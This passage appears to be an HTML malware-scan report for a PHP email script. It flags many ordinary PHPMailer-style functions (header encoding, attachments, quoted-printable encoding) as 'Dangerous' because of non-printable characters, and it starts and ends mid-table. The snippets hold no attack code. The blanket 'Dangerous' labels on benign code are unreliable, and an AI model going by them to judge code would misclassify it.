</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2731</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setMessageType</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2757</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">headerLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2759</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$name </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2763</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">a formatted mail line</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2768</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">textLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2770</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the file could not be found </span><span style="color: #007700">or </span><span style="color: #0000BB">read</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2787</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAttachment</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'attachment'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the </span><span style="color: #007700">array </span><span style="color: #0000BB">of attachments</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2830</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2832</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">attachment</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2843</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachAll</span><span style="color: #007700">(</span><span style="color: #0000BB">$disposition_type</span><span style="color: #007700">, </span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2845</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">text of body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2956</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$mime</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2968</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2983</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns false in 5.4</span><span style="color: #007700">+</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2997</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$file_buffer</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeString</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3037</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3048</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3057</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3059</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #DD0000">"\"</span><span style="color: #0000BB">$encoded</span><span style="color: #DD0000">\""</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3076</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3084</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">) && </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3085</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">which correctly encodes </span><span style="color: #007700">and </span><span style="color: #0000BB">wraps long</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3112</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3114</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3115</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">) > </span><span style="color: #0000BB">mb_strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CharSet</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3116</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions anyway</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3126</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">has8bitChars</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[\x80-\xFF]/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3134</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">by paravoid</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3135</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mb</span><span style="color: #007700">-</span><span style="color: #0000BB">encode</span><span style="color: #007700">-</span><span style="color: #0000BB">mimeheader</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#60283</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">base64EncodeWrapMB</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$linebreak </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">quoted</span><span style="color: #007700">-</span><span style="color: #0000BB">printable</span><span style="color: #007700">-</span><span style="color: #0000BB">decode</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#89417 Adapted from this comment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3183</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max </span><span style="color: #007700">= </span><span style="color: #0000BB">76</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3185</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s available (>= PHP5.3)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3186</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'quoted_printable_encode'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3187</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">quoted_printable_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[^\r\n]{' </span><span style="color: #007700">. (</span><span style="color: #0000BB">$line_max </span><span style="color: #007700">- </span><span style="color: #0000BB">3</span><span style="color: #007700">) . </span><span style="color: #DD0000">'}[^=\r\n]{2}/'</span><span style="color: #007700">, </span><span style="color: #DD0000">"$0=\r\n"</span><span style="color: #007700">, </span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that was removed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3208</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQPphp</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3213</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3224</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3261</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">' '</span><span style="color: #007700">, </span><span style="color: #DD0000">'_'</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3275</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringAttachment</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafClear</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">,</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3314</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True on successfully adding an attachment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3316</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addEmbeddedImage</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$cid</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'inline'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3361</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringEmbeddedImage</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 338</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path</span><span style="color: #007700">) </span><span style="color: #0000BB">of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3393</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">inlineImageExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3407</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
